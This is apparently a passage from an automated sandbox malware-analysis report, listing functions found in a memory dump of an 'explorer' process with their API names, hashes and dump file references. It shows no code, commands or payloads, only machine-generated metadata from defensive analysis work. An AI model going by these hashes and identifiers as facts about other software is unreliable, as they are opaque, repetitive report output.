                                                                                                            • Opcode ID: 777dbf8fc3632375601c26065b3abb19c333506527608912849f89bd8911c77b
                                                                                                            • Instruction ID: 50b0b0d47c1c98064202f0bb82ecd2ca5f304b361b62ed0137582e7ae3147d9c
                                                                                                            • Opcode Fuzzy Hash: 777dbf8fc3632375601c26065b3abb19c333506527608912849f89bd8911c77b
                                                                                                            • Instruction Fuzzy Hash: 3FF09230920A9091F7149F95FC9831433A1F7A47D9F64AA16C41AB6AF0CF7F88C9C350
                                                                                                            Function 00E1D05E Relevance: 5.0, APIs: 4, Instructions: 25COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$FreeLocal
                                                                                                            • String ID:
                                                                                                            • API String ID: 2513001865-0
                                                                                                            • Opcode ID: 82d95b7103033d902948a90c9e8e53d16c8e26a2043a74430fc3d0cce4b7eb71
                                                                                                            • Instruction ID: 77cbe27263bc5620cbc9df69a1a31fca782edaa63620c226e553d4c48f11c9ca
                                                                                                            • Opcode Fuzzy Hash: 82d95b7103033d902948a90c9e8e53d16c8e26a2043a74430fc3d0cce4b7eb71
                                                                                                            • Instruction Fuzzy Hash: 8901BD34158BC091F7119B24FD583E833A4F3A4BD5F542A26C55AB22B2CF7E88CAC301
                                                                                                            Function 00E1D033 Relevance: 5.0, APIs: 4, Instructions: 25COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$FreeLocal
                                                                                                            • String ID:
                                                                                                            • API String ID: 2513001865-0
                                                                                                            • Opcode ID: 22895e9f0ad57eb89ae3befc25affe5af3445f895d3ec8ceecc31fa57cfc47ed
                                                                                                            • Instruction ID: 77cbe27263bc5620cbc9df69a1a31fca782edaa63620c226e553d4c48f11c9ca
                                                                                                            • Opcode Fuzzy Hash: 22895e9f0ad57eb89ae3befc25affe5af3445f895d3ec8ceecc31fa57cfc47ed
                                                                                                            • Instruction Fuzzy Hash: 8901BD34158BC091F7119B24FD583E833A4F3A4BD5F542A26C55AB22B2CF7E88CAC301
                                                                                                            Function 00E058D9 Relevance: 5.0, APIs: 4, Instructions: 21COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseFreeHandleLocal
                                                                                                            • String ID:
                                                                                                            • API String ID: 836400252-0
                                                                                                            • Opcode ID: 407ad451bf2e2bf966aa73b9f4abba4dafead0985304cf0f56f4df019bbe3795
                                                                                                            • Instruction ID: 2d8c66900049bc66415e0a0b356a90e574ac3a199f40be49ec0785ab11ead19f
                                                                                                            • Opcode Fuzzy Hash: 407ad451bf2e2bf966aa73b9f4abba4dafead0985304cf0f56f4df019bbe3795
                                                                                                            • Instruction Fuzzy Hash: 38F01522200CC081E7108B50FA8836A63B1F3A0799F503B22D05AA64F0CFBEC8CACB01
                                                                                                            Function 00E05840 Relevance: 5.0, APIs: 4, Instructions: 21COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseFreeHandleLocal
                                                                                                            • String ID:
                                                                                                            • API String ID: 836400252-0
                                                                                                            • Opcode ID: 7a11eaf5b6decfaec6b1ebbcad1cf123de54f51fc7bafbc7f171939df23a1507
                                                                                                            • Instruction ID: 2d8c66900049bc66415e0a0b356a90e574ac3a199f40be49ec0785ab11ead19f
                                                                                                            • Opcode Fuzzy Hash: 7a11eaf5b6decfaec6b1ebbcad1cf123de54f51fc7bafbc7f171939df23a1507
                                                                                                            • Instruction Fuzzy Hash: 38F01522200CC081E7108B50FA8836A63B1F3A0799F503B22D05AA64F0CFBEC8CACB01